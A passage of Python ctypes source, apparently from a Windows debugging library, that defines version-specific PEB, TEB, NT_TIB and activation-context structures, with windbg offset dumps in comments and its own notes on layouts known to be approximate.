        ("FlsHighIndex", DWORD),
        ("WerRegistrationData", PVOID),
        ("WerShipAssertPtr", PVOID),
        ("pContextData", PVOID),
        ("pImageHeaderHash", PVOID),
    ]

    # UserSharedInfoPtr is an alias for the KernelCallbackTable slot:
    # the getter and setter below both access that same field.
    def __get_UserSharedInfoPtr(self):
        return self.KernelCallbackTable
    def __set_UserSharedInfoPtr(self, value):
        self.KernelCallbackTable = value
    UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
# Use the correct PEB structure definition.
# Defaults to the latest Windows version.
class PEB(Structure):
    """
    Process Environment Block.

    The fields are chosen at import time to match the Windows version
    named by the module-level C{os} string (a version label such as
    C{'Windows 7'}, not the standard C{os} module). Unrecognized
    versions fall back to the Windows 7 layout, selecting the 32 or
    64 bit variant from the size of SIZE_T.
    """
    _pack_ = 8
    if os == 'Windows NT':
        _pack_ = _PEB_NT._pack_
        _fields_ = _PEB_NT._fields_
    elif os == 'Windows 2000':
        _pack_ = _PEB_2000._pack_
        _fields_ = _PEB_2000._fields_
    elif os == 'Windows XP':
        _fields_ = _PEB_XP._fields_
    elif os == 'Windows XP (64 bits)':
        _fields_ = _PEB_XP_64._fields_
    elif os == 'Windows 2003':
        _fields_ = _PEB_2003._fields_
    elif os == 'Windows 2003 (64 bits)':
        _fields_ = _PEB_2003_64._fields_
    elif os == 'Windows 2003 R2':
        _fields_ = _PEB_2003_R2._fields_
    elif os == 'Windows 2003 R2 (64 bits)':
        _fields_ = _PEB_2003_R2_64._fields_
    elif os == 'Windows 2008':
        _fields_ = _PEB_2008._fields_
    elif os == 'Windows 2008 (64 bits)':
        _fields_ = _PEB_2008_64._fields_
    elif os == 'Windows 2008 R2':
        _fields_ = _PEB_2008_R2._fields_
    elif os == 'Windows 2008 R2 (64 bits)':
        _fields_ = _PEB_2008_R2_64._fields_
    elif os == 'Windows Vista':
        _fields_ = _PEB_Vista._fields_
    elif os == 'Windows Vista (64 bits)':
        _fields_ = _PEB_Vista_64._fields_
    elif os == 'Windows 7':
        _fields_ = _PEB_W7._fields_
    elif os == 'Windows 7 (64 bits)':
        _fields_ = _PEB_W7_64._fields_
    # Unknown version: assume the latest known layout (Windows 7),
    # using pointer size to decide between the 32 and 64 bit variants.
    elif sizeof(SIZE_T) == sizeof(DWORD):
        _fields_ = _PEB_W7._fields_
    else:
        _fields_ = _PEB_W7_64._fields_
PPEB = POINTER(PEB)
# PEB structure for WOW64 processes.
class PEB_32(Structure):
    """
    32 bit Process Environment Block, for WOW64 processes.

    Always uses the 32 bit structure definitions, even on 64 bit
    versions of Windows (note the C{startswith} tests, which match
    both the plain and the "(64 bits)" variants of the C{os} version
    string). Defaults to the Windows 7 layout.
    """
    _pack_ = 8
    if os == 'Windows NT':
        _pack_ = _PEB_NT._pack_
        _fields_ = _PEB_NT._fields_
    elif os == 'Windows 2000':
        _pack_ = _PEB_2000._pack_
        _fields_ = _PEB_2000._fields_
    elif os.startswith('Windows XP'):
        _fields_ = _PEB_XP._fields_
    # "2003 R2" must be tested before "2003", and "2008 R2" before
    # "2008", because startswith() would otherwise match the shorter
    # prefix first.
    elif os.startswith('Windows 2003 R2'):
        _fields_ = _PEB_2003_R2._fields_
    elif os.startswith('Windows 2003'):
        _fields_ = _PEB_2003._fields_
    elif os.startswith('Windows 2008 R2'):
        _fields_ = _PEB_2008_R2._fields_
    elif os.startswith('Windows 2008'):
        _fields_ = _PEB_2008._fields_
    elif os.startswith('Windows Vista'):
        _fields_ = _PEB_Vista._fields_
    else: #if os.startswith('Windows 7'):
        _fields_ = _PEB_W7._fields_
# from https://vmexplorer.svn.codeplex.com/svn/VMExplorer/src/Win32/Threads.cs
#
# [StructLayout (LayoutKind.Sequential, Size = 0x0C)]
# public struct Wx86ThreadState
# {
# public IntPtr CallBx86Eip; // Ptr32 to Uint4B
# public IntPtr DeallocationCpu; // Ptr32 to Void
# public Byte UseKnownWx86Dll; // UChar
# public Byte OleStubInvoked; // Char
# };
class Wx86ThreadState(Structure):
    """
    Wx86 (x86 emulation) per-thread state.

    Mirrors the C# declaration quoted in the comments above
    (Wx86ThreadState from VMExplorer's Threads.cs).
    """
    _fields_ = [
        ("CallBx86Eip", PVOID),       # Ptr32 to Uint4B
        ("DeallocationCpu", PVOID),   # Ptr32 to Void
        ("UseKnownWx86Dll", UCHAR),
        ("OleStubInvoked", CHAR),
    ]
# ntdll!_RTL_ACTIVATION_CONTEXT_STACK_FRAME
# +0x000 Previous : Ptr64 _RTL_ACTIVATION_CONTEXT_STACK_FRAME
# +0x008 ActivationContext : Ptr64 _ACTIVATION_CONTEXT
# +0x010 Flags : Uint4B
class RTL_ACTIVATION_CONTEXT_STACK_FRAME(Structure):
    """
    One frame of the activation context stack
    (ntdll!_RTL_ACTIVATION_CONTEXT_STACK_FRAME).

    The two pointer members are declared as plain PVOID rather than
    typed pointers.
    """
    _fields_ = [
        ("Previous", PVOID),           # PRTL_ACTIVATION_CONTEXT_STACK_FRAME
        ("ActivationContext", PVOID),  # PACTIVATION_CONTEXT
        ("Flags", DWORD),
    ]
# ntdll!_ACTIVATION_CONTEXT_STACK
# +0x000 ActiveFrame : Ptr64 _RTL_ACTIVATION_CONTEXT_STACK_FRAME
# +0x008 FrameListCache : _LIST_ENTRY
# +0x018 Flags : Uint4B
# +0x01c NextCookieSequenceNumber : Uint4B
# +0x020 StackId : Uint4B
class ACTIVATION_CONTEXT_STACK(Structure):
    """
    Activation context stack (ntdll!_ACTIVATION_CONTEXT_STACK), as
    shown in the windbg dump in the comments above.
    """
    _fields_ = [
        ("ActiveFrame", PVOID),  # PRTL_ACTIVATION_CONTEXT_STACK_FRAME
        ("FrameListCache", LIST_ENTRY),
        ("Flags", DWORD),
        ("NextCookieSequenceNumber", DWORD),
        ("StackId", DWORD),
    ]
# typedef struct _PROCESSOR_NUMBER {
# WORD Group;
# BYTE Number;
# BYTE Reserved;
# }PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
class PROCESSOR_NUMBER(Structure):
    """
    Processor group and number pair (PROCESSOR_NUMBER), matching the
    C declaration quoted in the comments above.
    """
    _fields_ = [
        ("Group", WORD),
        ("Number", BYTE),
        ("Reserved", BYTE),
    ]
# from http://www.nirsoft.net/kernel_struct/vista/NT_TIB.html
#
# typedef struct _NT_TIB
# {
# PEXCEPTION_REGISTRATION_RECORD ExceptionList;
# PVOID StackBase;
# PVOID StackLimit;
# PVOID SubSystemTib;
# union
# {
# PVOID FiberData;
# ULONG Version;
# };
# PVOID ArbitraryUserPointer;
# PNT_TIB Self;
# } NT_TIB, *PNT_TIB;
class _NT_TIB_UNION(Union):
    """
    Anonymous union inside NT_TIB: FiberData and Version overlay the
    same storage (see the C declaration in the comments above).
    """
    _fields_ = [
        ("FiberData", PVOID),
        ("Version", ULONG),
    ]
class NT_TIB(Structure):
    """
    Thread Information Block (NT_TIB), the header of the TEB.

    The anonymous C union is modeled as the named member C{u}; the
    properties below expose its FiberData/Version members directly on
    the structure, matching the C-level field names.
    """
    _fields_ = [
        ("ExceptionList", PVOID),  # PEXCEPTION_REGISTRATION_RECORD
        ("StackBase", PVOID),
        ("StackLimit", PVOID),
        ("SubSystemTib", PVOID),
        ("u", _NT_TIB_UNION),
        ("ArbitraryUserPointer", PVOID),
        ("Self", PVOID),  # PNTTIB
    ]

    # Pass-through accessors for the union members.
    def __get_FiberData(self):
        return self.u.FiberData
    def __set_FiberData(self, value):
        self.u.FiberData = value
    FiberData = property(__get_FiberData, __set_FiberData)

    def __get_Version(self):
        return self.u.Version
    def __set_Version(self, value):
        self.u.Version = value
    Version = property(__get_Version, __set_Version)

PNTTIB = POINTER(NT_TIB)  # pointer type for the Self member
# From http://www.nirsoft.net/kernel_struct/vista/EXCEPTION_REGISTRATION_RECORD.html
#
# typedef struct _EXCEPTION_REGISTRATION_RECORD
# {
# PEXCEPTION_REGISTRATION_RECORD Next;
# PEXCEPTION_DISPOSITION Handler;
# } EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;
# EXCEPTION_REGISTRATION_RECORD is self-referential (Next points to
# another record), so the class is declared empty first and its
# _fields_ are assigned afterwards.
class EXCEPTION_REGISTRATION_RECORD(Structure):
    pass

EXCEPTION_DISPOSITION = DWORD
##PEXCEPTION_DISPOSITION          = POINTER(EXCEPTION_DISPOSITION)
##PEXCEPTION_REGISTRATION_RECORD  = POINTER(EXCEPTION_REGISTRATION_RECORD)
# Generic void pointers are used here instead of typed POINTER()s
# (the typed versions are kept commented out above).
PEXCEPTION_DISPOSITION = PVOID
PEXCEPTION_REGISTRATION_RECORD = PVOID

EXCEPTION_REGISTRATION_RECORD._fields_ = [
    ("Next", PEXCEPTION_REGISTRATION_RECORD),
    ("Handler", PEXCEPTION_DISPOSITION),
]

##PPEB = POINTER(PEB)
# NOTE: this rebinds PPEB — defined earlier as POINTER(PEB) — to a
# plain void pointer, which is what the TEB definitions below use for
# their ProcessEnvironmentBlock member.
PPEB = PVOID
# From http://www.nirsoft.net/kernel_struct/vista/GDI_TEB_BATCH.html
#
# typedef struct _GDI_TEB_BATCH
# {
# ULONG Offset;
# ULONG HDC;
# ULONG Buffer[310];
# } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
class GDI_TEB_BATCH(Structure):
    """
    GDI batching buffer embedded in the TEB (GDI_TEB_BATCH), matching
    the C declaration quoted in the comments above.
    """
    _fields_ = [
        ("Offset", ULONG),
        ("HDC", ULONG),
        ("Buffer", ULONG * 310),
    ]
# ntdll!_TEB_ACTIVE_FRAME_CONTEXT
# +0x000 Flags : Uint4B
# +0x008 FrameName : Ptr64 Char
class TEB_ACTIVE_FRAME_CONTEXT(Structure):
    """
    Context descriptor for a TEB active frame
    (ntdll!_TEB_ACTIVE_FRAME_CONTEXT).
    """
    _fields_ = [
        ("Flags", DWORD),
        ("FrameName", LPVOID),  # LPCHAR
    ]

PTEB_ACTIVE_FRAME_CONTEXT = POINTER(TEB_ACTIVE_FRAME_CONTEXT)
# ntdll!_TEB_ACTIVE_FRAME
# +0x000 Flags : Uint4B
# +0x008 Previous : Ptr64 _TEB_ACTIVE_FRAME
# +0x010 Context : Ptr64 _TEB_ACTIVE_FRAME_CONTEXT
class TEB_ACTIVE_FRAME(Structure):
    """
    One node in the TEB active frame list (ntdll!_TEB_ACTIVE_FRAME).

    Previous and Context are declared as untyped LPVOID rather than
    the typed pointers noted in the trailing comments.
    """
    _fields_ = [
        ("Flags", DWORD),
        ("Previous", LPVOID),  # PTEB_ACTIVE_FRAME
        ("Context", LPVOID),   # PTEB_ACTIVE_FRAME_CONTEXT
    ]

PTEB_ACTIVE_FRAME = POINTER(TEB_ACTIVE_FRAME)
# SameTebFlags: one bit per flag in the TEB SameTebFlags bitfield
# (bit positions match the windbg dumps of _TEB further below).
DbgSafeThunkCall        = 0x0001    # bit 0
DbgInDebugPrint         = 0x0002    # bit 1
DbgHasFiberData         = 0x0004    # bit 2
DbgSkipThreadAttach     = 0x0008    # bit 3
DbgWerInShipAssertCode  = 0x0010    # bit 4
DbgRanProcessInit       = 0x0020    # bit 5
DbgClonedThread         = 0x0040    # bit 6
DbgSuppressDebugMsg     = 0x0080    # bit 7
RtlDisableUserStackWalk = 0x0100    # bit 8
RtlExceptionAttached    = 0x0200    # bit 9
RtlInitialThread        = 0x0400    # bit 10
# XXX Known to be inaccurate: this NT TEB definition is only a rough
# approximation and its field offsets should not be trusted.
class _TEB_NT(Structure):
    """
    Thread Environment Block for Windows NT.

    NOTE(review): the original author marked this definition as known
    to be inaccurate (see the comment above the class). Field offsets
    should not be trusted for Windows NT; use with caution.
    """
    _pack_ = 4
    _fields_ = [
        ("NtTib", NT_TIB),
        ("EnvironmentPointer", PVOID),
        ("ClientId", CLIENT_ID),
        ("ActiveRpcHandle", HANDLE),
        ("ThreadLocalStoragePointer", PVOID),
        ("ProcessEnvironmentBlock", PPEB),
        ("LastErrorValue", ULONG),
        ("CountOfOwnedCriticalSections", ULONG),
        ("CsrClientThread", PVOID),
        ("Win32ThreadInfo", PVOID),
        ("User32Reserved", ULONG * 26),
        ("UserReserved", ULONG * 5),
        ("WOW32Reserved", PVOID),  # ptr to wow64cpu!X86SwitchTo64BitMode
        ("CurrentLocale", ULONG),
        ("FpSoftwareStatusRegister", ULONG),
        ("SystemReserved1", PVOID * 54),
        ("Spare1", PVOID),
        ("ExceptionCode", ULONG),
        ("ActivationContextStackPointer", PVOID),  # PACTIVATION_CONTEXT_STACK
        ("SpareBytes1", ULONG * 36),
        ("TxFsContext", ULONG),
        ("GdiTebBatch", GDI_TEB_BATCH),
        ("RealClientId", CLIENT_ID),
        ("GdiCachedProcessHandle", PVOID),
        ("GdiClientPID", ULONG),
        ("GdiClientTID", ULONG),
        ("GdiThreadLocalInfo", PVOID),
        ("Win32ClientInfo", PVOID * 62),
        ("glDispatchTable", PVOID * 233),
        ("glReserved1", ULONG * 29),
        ("glReserved2", PVOID),
        ("glSectionInfo", PVOID),
        ("glSection", PVOID),
        ("glTable", PVOID),
        ("glCurrentRC", PVOID),
        ("glContext", PVOID),
        ("LastStatusValue", NTSTATUS),
        ("StaticUnicodeString", UNICODE_STRING),
        ("StaticUnicodeBuffer", WCHAR * 261),
        ("DeallocationStack", PVOID),
        ("TlsSlots", PVOID * 64),
        ("TlsLinks", LIST_ENTRY),
        ("Vdm", PVOID),
        ("ReservedForNtRpc", PVOID),
        ("DbgSsReserved", PVOID * 2),
        ("HardErrorDisabled", ULONG),
        ("Instrumentation", PVOID * 9),
        ("ActivityId", GUID),
        ("SubProcessTag", PVOID),
        ("EtwLocalData", PVOID),
        ("EtwTraceData", PVOID),
        ("WinSockData", PVOID),
        ("GdiBatchCount", ULONG),
        ("SpareBool0", BOOLEAN),
        ("SpareBool1", BOOLEAN),
        ("SpareBool2", BOOLEAN),
        ("IdealProcessor", UCHAR),
        ("GuaranteedStackBytes", ULONG),
        ("ReservedForPerf", PVOID),
        ("ReservedForOle", PVOID),
        ("WaitingOnLoaderLock", ULONG),
        ("StackCommit", PVOID),
        ("StackCommitMax", PVOID),
        ("StackReserved", PVOID),
    ]
# Not the true Windows 2000 TEB layout: the "dt _TEB" dump for Windows 2000
# was unavailable, so the NT definition is reused as an approximation.
_TEB_2000 = _TEB_NT
# +0x000 NtTib : _NT_TIB
# +0x01c EnvironmentPointer : Ptr32 Void
# +0x020 ClientId : _CLIENT_ID
# +0x028 ActiveRpcHandle : Ptr32 Void
# +0x02c ThreadLocalStoragePointer : Ptr32 Void
# +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
# +0x034 LastErrorValue : Uint4B
# +0x038 CountOfOwnedCriticalSections : Uint4B
# +0x03c CsrClientThread : Ptr32 Void
# +0x040 Win32ThreadInfo : Ptr32 Void
# +0x044 User32Reserved : [26] Uint4B
# +0x0ac UserReserved : [5] Uint4B
# +0x0c0 WOW32Reserved : Ptr32 Void
# +0x0c4 CurrentLocale : Uint4B
# +0x0c8 FpSoftwareStatusRegister : Uint4B
# +0x0cc SystemReserved1 : [54] Ptr32 Void
# +0x1a4 ExceptionCode : Int4B
# +0x1a8 ActivationContextStack : _ACTIVATION_CONTEXT_STACK
# +0x1bc SpareBytes1 : [24] UChar
# +0x1d4 GdiTebBatch : _GDI_TEB_BATCH
# +0x6b4 RealClientId : _CLIENT_ID
# +0x6bc GdiCachedProcessHandle : Ptr32 Void
# +0x6c0 GdiClientPID : Uint4B
# +0x6c4 GdiClientTID : Uint4B
# +0x6c8 GdiThreadLocalInfo : Ptr32 Void
# +0x6cc Win32ClientInfo : [62] Uint4B
# +0x7c4 glDispatchTable : [233] Ptr32 Void
# +0xb68 glReserved1 : [29] Uint4B
# +0xbdc glReserved2 : Ptr32 Void
# +0xbe0 glSectionInfo : Ptr32 Void
# +0xbe4 glSection : Ptr32 Void
# +0xbe8 glTable : Ptr32 Void
# +0xbec glCurrentRC : Ptr32 Void
# +0xbf0 glContext : Ptr32 Void
# +0xbf4 LastStatusValue : Uint4B
# +0xbf8 StaticUnicodeString : _UNICODE_STRING
# +0xc00 StaticUnicodeBuffer : [261] Uint2B
# +0xe0c DeallocationStack : Ptr32 Void
# +0xe10 TlsSlots : [64] Ptr32 Void
# +0xf10 TlsLinks : _LIST_ENTRY
# +0xf18 Vdm : Ptr32 Void
# +0xf1c ReservedForNtRpc : Ptr32 Void
# +0xf20 DbgSsReserved : [2] Ptr32 Void
# +0xf28 HardErrorsAreDisabled : Uint4B
# +0xf2c Instrumentation : [16] Ptr32 Void
# +0xf6c WinSockData : Ptr32 Void
# +0xf70 GdiBatchCount : Uint4B
# +0xf74 InDbgPrint : UChar
# +0xf75 FreeStackOnTermination : UChar
# +0xf76 HasFiberData : UChar
# +0xf77 IdealProcessor : UChar
# +0xf78 Spare3 : Uint4B
# +0xf7c ReservedForPerf : Ptr32 Void
# +0xf80 ReservedForOle : Ptr32 Void
# +0xf84 WaitingOnLoaderLock : Uint4B
# +0xf88 Wx86Thread : _Wx86ThreadState
# +0xf94 TlsExpansionSlots : Ptr32 Ptr32 Void
# +0xf98 ImpersonationLocale : Uint4B
# +0xf9c IsImpersonating : Uint4B
# +0xfa0 NlsCache : Ptr32 Void
# +0xfa4 pShimData : Ptr32 Void
# +0xfa8 HeapVirtualAffinity : Uint4B
# +0xfac CurrentTransactionHandle : Ptr32 Void
# +0xfb0 ActiveFrame : Ptr32 _TEB_ACTIVE_FRAME
# +0xfb4 SafeThunkCall : UChar
# +0xfb5 BooleanSpare : [3] UChar
class _TEB_XP(Structure):
    """
    Thread Environment Block for 32 bit Windows XP.

    NOTE(review): the windbg dump above shows an *inline*
    _ACTIVATION_CONTEXT_STACK at +0x1a8 followed by SpareBytes1[24],
    placing GdiTebBatch at +0x1d4. This definition instead uses a
    pointer plus SpareBytes1[24] plus TxFsContext (TxFsContext does
    not appear in the XP dump at all), so offsets of GdiTebBatch and
    everything after it may not match XP — verify before relying on
    fields beyond ActivationContextStackPointer.
    """
    _pack_ = 8
    _fields_ = [
        ("NtTib", NT_TIB),
        ("EnvironmentPointer", PVOID),
        ("ClientId", CLIENT_ID),
        ("ActiveRpcHandle", HANDLE),
        ("ThreadLocalStoragePointer", PVOID),
        ("ProcessEnvironmentBlock", PVOID),  # PPEB
        ("LastErrorValue", DWORD),
        ("CountOfOwnedCriticalSections", DWORD),
        ("CsrClientThread", PVOID),
        ("Win32ThreadInfo", PVOID),
        ("User32Reserved", DWORD * 26),
        ("UserReserved", DWORD * 5),
        ("WOW32Reserved", PVOID),  # ptr to wow64cpu!X86SwitchTo64BitMode
        ("CurrentLocale", DWORD),
        ("FpSoftwareStatusRegister", DWORD),
        ("SystemReserved1", PVOID * 54),
        ("ExceptionCode", SDWORD),
        ("ActivationContextStackPointer", PVOID),  # PACTIVATION_CONTEXT_STACK
        ("SpareBytes1", UCHAR * 24),
        ("TxFsContext", DWORD),
        ("GdiTebBatch", GDI_TEB_BATCH),
        ("RealClientId", CLIENT_ID),
        ("GdiCachedProcessHandle", HANDLE),
        ("GdiClientPID", DWORD),
        ("GdiClientTID", DWORD),
        ("GdiThreadLocalInfo", PVOID),
        ("Win32ClientInfo", DWORD * 62),
        ("glDispatchTable", PVOID * 233),
        ("glReserved1", DWORD * 29),
        ("glReserved2", PVOID),
        ("glSectionInfo", PVOID),
        ("glSection", PVOID),
        ("glTable", PVOID),
        ("glCurrentRC", PVOID),
        ("glContext", PVOID),
        ("LastStatusValue", NTSTATUS),
        ("StaticUnicodeString", UNICODE_STRING),
        ("StaticUnicodeBuffer", WCHAR * 261),
        ("DeallocationStack", PVOID),
        ("TlsSlots", PVOID * 64),
        ("TlsLinks", LIST_ENTRY),
        ("Vdm", PVOID),
        ("ReservedForNtRpc", PVOID),
        ("DbgSsReserved", PVOID * 2),
        ("HardErrorsAreDisabled", DWORD),
        ("Instrumentation", PVOID * 16),
        ("WinSockData", PVOID),
        ("GdiBatchCount", DWORD),
        ("InDbgPrint", BOOLEAN),
        ("FreeStackOnTermination", BOOLEAN),
        ("HasFiberData", BOOLEAN),
        ("IdealProcessor", UCHAR),
        ("Spare3", DWORD),
        ("ReservedForPerf", PVOID),
        ("ReservedForOle", PVOID),
        ("WaitingOnLoaderLock", DWORD),
        ("Wx86Thread", Wx86ThreadState),
        ("TlsExpansionSlots", PVOID),  # Ptr32 Ptr32 Void
        ("ImpersonationLocale", DWORD),
        ("IsImpersonating", BOOL),
        ("NlsCache", PVOID),
        ("pShimData", PVOID),
        ("HeapVirtualAffinity", DWORD),
        ("CurrentTransactionHandle", HANDLE),
        ("ActiveFrame", PVOID),  # PTEB_ACTIVE_FRAME
        ("SafeThunkCall", BOOLEAN),
        ("BooleanSpare", BOOLEAN * 3),
    ]
# +0x000 NtTib : _NT_TIB
# +0x038 EnvironmentPointer : Ptr64 Void
# +0x040 ClientId : _CLIENT_ID
# +0x050 ActiveRpcHandle : Ptr64 Void
# +0x058 ThreadLocalStoragePointer : Ptr64 Void
# +0x060 ProcessEnvironmentBlock : Ptr64 _PEB
# +0x068 LastErrorValue : Uint4B
# +0x06c CountOfOwnedCriticalSections : Uint4B
# +0x070 CsrClientThread : Ptr64 Void
# +0x078 Win32ThreadInfo : Ptr64 Void
# +0x080 User32Reserved : [26] Uint4B
# +0x0e8 UserReserved : [5] Uint4B
# +0x100 WOW32Reserved : Ptr64 Void
# +0x108 CurrentLocale : Uint4B
# +0x10c FpSoftwareStatusRegister : Uint4B
# +0x110 SystemReserved1 : [54] Ptr64 Void
# +0x2c0 ExceptionCode : Int4B
# +0x2c8 ActivationContextStackPointer : Ptr64 _ACTIVATION_CONTEXT_STACK
# +0x2d0 SpareBytes1 : [28] UChar
# +0x2f0 GdiTebBatch : _GDI_TEB_BATCH
# +0x7d8 RealClientId : _CLIENT_ID
# +0x7e8 GdiCachedProcessHandle : Ptr64 Void
# +0x7f0 GdiClientPID : Uint4B
# +0x7f4 GdiClientTID : Uint4B
# +0x7f8 GdiThreadLocalInfo : Ptr64 Void
# +0x800 Win32ClientInfo : [62] Uint8B
# +0x9f0 glDispatchTable : [233] Ptr64 Void
# +0x1138 glReserved1 : [29] Uint8B
# +0x1220 glReserved2 : Ptr64 Void
# +0x1228 glSectionInfo : Ptr64 Void
# +0x1230 glSection : Ptr64 Void
# +0x1238 glTable : Ptr64 Void
# +0x1240 glCurrentRC : Ptr64 Void
# +0x1248 glContext : Ptr64 Void
# +0x1250 LastStatusValue : Uint4B
# +0x1258 StaticUnicodeString : _UNICODE_STRING
# +0x1268 StaticUnicodeBuffer : [261] Uint2B
# +0x1478 DeallocationStack : Ptr64 Void
# +0x1480 TlsSlots : [64] Ptr64 Void
# +0x1680 TlsLinks : _LIST_ENTRY
# +0x1690 Vdm : Ptr64 Void
# +0x1698 ReservedForNtRpc : Ptr64 Void
# +0x16a0 DbgSsReserved : [2] Ptr64 Void
# +0x16b0 HardErrorMode : Uint4B
# +0x16b8 Instrumentation : [14] Ptr64 Void
# +0x1728 SubProcessTag : Ptr64 Void
# +0x1730 EtwTraceData : Ptr64 Void
# +0x1738 WinSockData : Ptr64 Void
# +0x1740 GdiBatchCount : Uint4B
# +0x1744 InDbgPrint : UChar
# +0x1745 FreeStackOnTermination : UChar
# +0x1746 HasFiberData : UChar
# +0x1747 IdealProcessor : UChar
# +0x1748 GuaranteedStackBytes : Uint4B
# +0x1750 ReservedForPerf : Ptr64 Void
# +0x1758 ReservedForOle : Ptr64 Void
# +0x1760 WaitingOnLoaderLock : Uint4B
# +0x1768 SparePointer1 : Uint8B
# +0x1770 SoftPatchPtr1 : Uint8B
# +0x1778 SoftPatchPtr2 : Uint8B
# +0x1780 TlsExpansionSlots : Ptr64 Ptr64 Void
# +0x1788 DeallocationBStore : Ptr64 Void
# +0x1790 BStoreLimit : Ptr64 Void
# +0x1798 ImpersonationLocale : Uint4B
# +0x179c IsImpersonating : Uint4B
# +0x17a0 NlsCache : Ptr64 Void
# +0x17a8 pShimData : Ptr64 Void
# +0x17b0 HeapVirtualAffinity : Uint4B
# +0x17b8 CurrentTransactionHandle : Ptr64 Void
# +0x17c0 ActiveFrame : Ptr64 _TEB_ACTIVE_FRAME
# +0x17c8 FlsData : Ptr64 Void
# +0x17d0 SafeThunkCall : UChar
# +0x17d1 BooleanSpare : [3] UChar
class _TEB_XP_64(Structure):
    """
    Thread Environment Block for 64 bit Windows XP.

    Field order and types follow the windbg "dt _TEB" dump in the
    comments above; do not reorder.
    """
    _pack_ = 8
    _fields_ = [
        ("NtTib", NT_TIB),
        ("EnvironmentPointer", PVOID),
        ("ClientId", CLIENT_ID),
        ("ActiveRpcHandle", PVOID),
        ("ThreadLocalStoragePointer", PVOID),
        ("ProcessEnvironmentBlock", PVOID),  # PPEB
        ("LastErrorValue", DWORD),
        ("CountOfOwnedCriticalSections", DWORD),
        ("CsrClientThread", PVOID),
        ("Win32ThreadInfo", PVOID),
        ("User32Reserved", DWORD * 26),
        ("UserReserved", DWORD * 5),
        ("WOW32Reserved", PVOID),  # ptr to wow64cpu!X86SwitchTo64BitMode
        ("CurrentLocale", DWORD),
        ("FpSoftwareStatusRegister", DWORD),
        ("SystemReserved1", PVOID * 54),
        ("ExceptionCode", SDWORD),
        ("ActivationContextStackPointer", PVOID),  # PACTIVATION_CONTEXT_STACK
        ("SpareBytes1", UCHAR * 28),
        ("GdiTebBatch", GDI_TEB_BATCH),
        ("RealClientId", CLIENT_ID),
        ("GdiCachedProcessHandle", HANDLE),
        ("GdiClientPID", DWORD),
        ("GdiClientTID", DWORD),
        ("GdiThreadLocalInfo", PVOID),
        ("Win32ClientInfo", QWORD * 62),
        ("glDispatchTable", PVOID * 233),
        ("glReserved1", QWORD * 29),
        ("glReserved2", PVOID),
        ("glSectionInfo", PVOID),
        ("glSection", PVOID),
        ("glTable", PVOID),
        ("glCurrentRC", PVOID),
        ("glContext", PVOID),
        ("LastStatusValue", NTSTATUS),
        ("StaticUnicodeString", UNICODE_STRING),
        ("StaticUnicodeBuffer", WCHAR * 261),
        ("DeallocationStack", PVOID),
        ("TlsSlots", PVOID * 64),
        ("TlsLinks", LIST_ENTRY),
        ("Vdm", PVOID),
        ("ReservedForNtRpc", PVOID),
        ("DbgSsReserved", PVOID * 2),
        ("HardErrorMode", DWORD),
        ("Instrumentation", PVOID * 14),
        ("SubProcessTag", PVOID),
        ("EtwTraceData", PVOID),
        ("WinSockData", PVOID),
        ("GdiBatchCount", DWORD),
        ("InDbgPrint", BOOLEAN),
        ("FreeStackOnTermination", BOOLEAN),
        ("HasFiberData", BOOLEAN),
        ("IdealProcessor", UCHAR),
        ("GuaranteedStackBytes", DWORD),
        ("ReservedForPerf", PVOID),
        ("ReservedForOle", PVOID),
        ("WaitingOnLoaderLock", DWORD),
        ("SparePointer1", PVOID),
        ("SoftPatchPtr1", PVOID),
        ("SoftPatchPtr2", PVOID),
        ("TlsExpansionSlots", PVOID),  # Ptr64 Ptr64 Void
        # The next two members exist only on 64 bit (IA64 backing store).
        ("DeallocationBStore", PVOID),
        ("BStoreLimit", PVOID),
        ("ImpersonationLocale", DWORD),
        ("IsImpersonating", BOOL),
        ("NlsCache", PVOID),
        ("pShimData", PVOID),
        ("HeapVirtualAffinity", DWORD),
        ("CurrentTransactionHandle", HANDLE),
        ("ActiveFrame", PVOID),  # PTEB_ACTIVE_FRAME
        ("FlsData", PVOID),
        ("SafeThunkCall", BOOLEAN),
        ("BooleanSpare", BOOLEAN * 3),
    ]
# +0x000 NtTib : _NT_TIB
# +0x01c EnvironmentPointer : Ptr32 Void
# +0x020 ClientId : _CLIENT_ID
# +0x028 ActiveRpcHandle : Ptr32 Void
# +0x02c ThreadLocalStoragePointer : Ptr32 Void
# +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
# +0x034 LastErrorValue : Uint4B
# +0x038 CountOfOwnedCriticalSections : Uint4B
# +0x03c CsrClientThread : Ptr32 Void
# +0x040 Win32ThreadInfo : Ptr32 Void
# +0x044 User32Reserved : [26] Uint4B
# +0x0ac UserReserved : [5] Uint4B
# +0x0c0 WOW32Reserved : Ptr32 Void
# +0x0c4 CurrentLocale : Uint4B
# +0x0c8 FpSoftwareStatusRegister : Uint4B
# +0x0cc SystemReserved1 : [54] Ptr32 Void
# +0x1a4 ExceptionCode : Int4B
# +0x1a8 ActivationContextStackPointer : Ptr32 _ACTIVATION_CONTEXT_STACK
# +0x1ac SpareBytes1 : [40] UChar
# +0x1d4 GdiTebBatch : _GDI_TEB_BATCH
# +0x6b4 RealClientId : _CLIENT_ID
# +0x6bc GdiCachedProcessHandle : Ptr32 Void
# +0x6c0 GdiClientPID : Uint4B
# +0x6c4 GdiClientTID : Uint4B
# +0x6c8 GdiThreadLocalInfo : Ptr32 Void
# +0x6cc Win32ClientInfo : [62] Uint4B
# +0x7c4 glDispatchTable : [233] Ptr32 Void
# +0xb68 glReserved1 : [29] Uint4B
# +0xbdc glReserved2 : Ptr32 Void
# +0xbe0 glSectionInfo : Ptr32 Void
# +0xbe4 glSection : Ptr32 Void
# +0xbe8 glTable : Ptr32 Void
# +0xbec glCurrentRC : Ptr32 Void
# +0xbf0 glContext : Ptr32 Void
# +0xbf4 LastStatusValue : Uint4B
# +0xbf8 StaticUnicodeString : _UNICODE_STRING
# +0xc00 StaticUnicodeBuffer : [261] Uint2B
# +0xe0c DeallocationStack : Ptr32 Void
# +0xe10 TlsSlots : [64] Ptr32 Void
# +0xf10 TlsLinks : _LIST_ENTRY
# +0xf18 Vdm : Ptr32 Void
# +0xf1c ReservedForNtRpc : Ptr32 Void
# +0xf20 DbgSsReserved : [2] Ptr32 Void
# +0xf28 HardErrorMode : Uint4B
# +0xf2c Instrumentation : [14] Ptr32 Void
